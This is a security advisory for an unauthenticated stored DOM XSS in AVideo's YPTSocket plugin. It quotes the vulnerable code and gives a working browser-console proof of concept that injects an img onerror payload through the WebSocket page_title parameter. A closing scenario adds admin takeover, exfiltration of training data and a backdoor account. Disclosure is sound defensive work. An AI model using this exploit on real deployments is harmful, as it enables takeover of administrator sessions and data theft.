GHSA-8whc-2wmv-ww35: AVideo YPTSocket: Stored DOM XSS enables admin takeover

# Unauthenticated Stored DOM XSS via `page_title` Broadcast in AVideo YPTSocket Plugin ## Summary A stored DOM Cross-Site Scripting vulnerability (CWE-79) in the AVideo YPTSocket plugin lets any unauthenticated remote attacker execute arbitrary JavaScript in the authenticated origin of every administrator currently viewing a page that renders the YPTSocket online-users debug panel. `plugin/YPTSocket/getWebSocket.json.php` issues a signed WebSocket token to any anonymous caller, and `MessageSQLiteV2::onOpen` at `plugin/YPTSocket/MessageSQLiteV2.php` lines 91 and 110 reads the attacker-controlled `webSocketSelfURI` and `page_title` query parameters from the WebSocket connection URL with no validation. Both values persist into the in-memory SQLite `connections` table and broadcast inside the `users_id_online` array sent to every connected client; on the client, `plugin/YPTSocket/script.js::updateSocketUserCard` interpolates the broadcast `page_title` into an HTML template literal that is passed to jQuery `$.append(html)`, which parses attacker bytes into live DOM nodes including `<img>` with inline event handlers. ## Details `plugin/YPTSocket/getWebSocket.json.php` issues a WebSocket token to any caller; the only gate is `AVideoPlugin::isEnabledByName("YPTSocket")`. The token-issuance helper `getEncryptedInfo()` at `plugin/YPTSocket/functions.php:21-24` writes `$_REQUEST['webSocketSelfURI']` directly into the per-token state without validation: ```php // plugin/YPTSocket/functions.php:21-24 if (!empty($_REQUEST['webSocketSelfURI'])) { $msgObj->selfURI = $_REQUEST['webSocketSelfURI']; } else { $msgObj->selfURI = getSelfURI(); } ``` On WebSocket open, `MessageSQLiteV2::onOpen` reads `webSocketSelfURI` and `page_title` from the connection URL query string and persists both verbatim into the in-memory SQLite `connections` table: ```php // plugin/YPTSocket/MessageSQLiteV2.php:91 and :110 $client['selfURI'] = $wsocketGetVars['webSocketSelfURI']; // line 91 $client['page_title'] = @utf8_encode(@$wsocketGetVars['page_title']); // line 110 ``` `utf8_encode` is not an HTML encode. The broadcast helper `dbGetUniqueUsers()` (`plugin/YPTSocket/db.php:288-300`) selects both columns without escape and returns them as part of `users_id_online`, which `msgToResourceId()` at `MessageSQLiteV2.php:444` places in the outbound JSON frame sent to every connected client. JSON encoding escapes `"` to `\"` for transport, but the receiving browser's `JSON.parse(event.data)` reverses the escape and restores the raw HTML bytes before they reach `script.js`. On the client, `plugin/YPTSocket/script.js::updateSocketUserCard` (lines 638 to 700) interpolates the broadcast `page_title` into an HTML template literal and passes the result to jQuery `$.append(html)`: ```js // plugin/YPTSocket/script.js:685-691 if (userData.page_title) textParts.push(userData.page_title); const finalText = textParts.join(' '); const html = `<a href="${selfURI}" target="_blank" ...> <i class="far fa-compass"></i> ${finalText} </a>`; $(`#${socketUserDivID} .socketUserPages`).append(html); // sink ``` jQuery's `.append(html)` parses the string with the browser HTML parser, building live DOM nodes for any tag the attacker supplied, including `<img>` with inline event handlers. The browser's load attempt on the attacker-supplied `src` fails and the inline `onerror` event handler fires synchronously inside the admin's authenticated origin. The victim precondition is that the YPTSocket online-users debug panel (`#socketUsersURI`) is rendered in the admin's DOM. `plugin/YPTSocket/footer.php:12` renders the panel when `User::isAdmin() && !empty($obj->debugSocket)`. The `debugSocket` plugin flag is `true` by default after enable, so any admin viewing any logged-in AVideo page with the standard YPTSocket footer holds a live broadcast subscription. **Affected product:** AVideo (WWBN), YPTSocket plugin **Tested version:** master branch (snapshot dated 2026-05-22) ## PoC The AVideo deployment must have the YPTSocket plugin enabled (the default after enable) with `debugSocket=true` (the default), and at least one administrator must currently be viewing a page that loads the YPTSocket footer (any logged-in AVideo page does). The attacker requires only network reachability to `getWebSocket.json.php` over HTTPS and to the WebSocket TLS port. Open DevTools Console on any browser tab pointed at the AVideo origin and paste the following one-liner. No authentication and no session cookie are required for the attacker side: ```js (async () => { const PAYLOAD = '<img src=q onerror="document.body.style.backgroundColor=String.fromCharCode(114,101,100);document.title=String.fromCharCode(80,87,78,69,68)">'; const r = await fetch('/plugin/YPTSocket/getWebSocket.json.php?webSocketSelfURI=' + encodeURIComponent('/dashboard?x=1')); const j = await r.json(); const u = j.webSocketURL + '&webSocketSelfURI=' + encodeURIComponent('/dashboard?x=1') + '&page_title=' + encodeURIComponent(PAYLOAD); const ws = new WebSocket(u); ws.onopen = () => console.log('attacker connected'); ws.onmessage = e => console.log('attacker frame:', e.data.slice(0, 200)); })(); ``` The payload uses `String.fromCharCode` to spell its side-effect strings (`String.fromCharCode(114,101,100)` decodes to `red`; `String.fromCharCode(80,87,78,69,68)` decodes to `PWNED`) so no quote, backtick, or backslash bytes appear in transit. Within one server broadcast cycle, every administrator tab currently rendering the YPTSocket debug panel turns its page background red and changes its browser tab title to `PWNED`. Both side-effects are produced by attacker JavaScript executing inside the admin's authenticated AVideo origin. ## Impact This is a stored DOM Cross-Site Scripting vulnerability (CWE-79) in the AVideo YPTSocket plugin. An unauthenticated remote attacker who can reach the YPTSocket endpoints plants the payload by issuing one anonymous HTTP GET to `getWebSocket.json.php` followed by one anonymous WebSocket frame carrying the malicious `page_title`. The attacker JavaScript executes inside the admin's authenticated AVideo origin and can read non-`HttpOnly` cookies and the CSRF token rendered into the admin dashboard, issue authenticated requests to any admin-only endpoint, exfiltrate the admin dashboard DOM, and chain into any admin-context mutation. When the victim is an AVideo administrator, the attacker turns a single anonymous WebSocket connection into full administrative takeover via the admin's own session.

An attacker targeting an AI team's AVideo instance — used for labeling training videos or managing a media dataset — issues a single unauthenticated GET to /plugin/YPTSocket/getWebSocket.json.php to receive a signed WebSocket token, as the endpoint requires no session cookie. The attacker opens a WebSocket connection using that token, appending a malicious page_title containing an HTML payload such as an img tag with an inline onerror handler to the connection URL. AVideo stores the payload verbatim in its in-memory SQLite connections table and broadcasts it inside the users_id_online array to every connected client. When the AI team's administrator — currently reviewing dataset uploads in the admin panel — receives the broadcast frame, jQuery's .append() parses the injected HTML, the browser fires the onerror handler, and attacker-controlled JavaScript executes inside the admin's authenticated origin. The attacker script reads the CSRF token from the admin DOM, issues authenticated requests to dataset management endpoints, exfiltrates uploaded training videos and labels, and optionally creates a persistent backdoor admin account before disconnecting.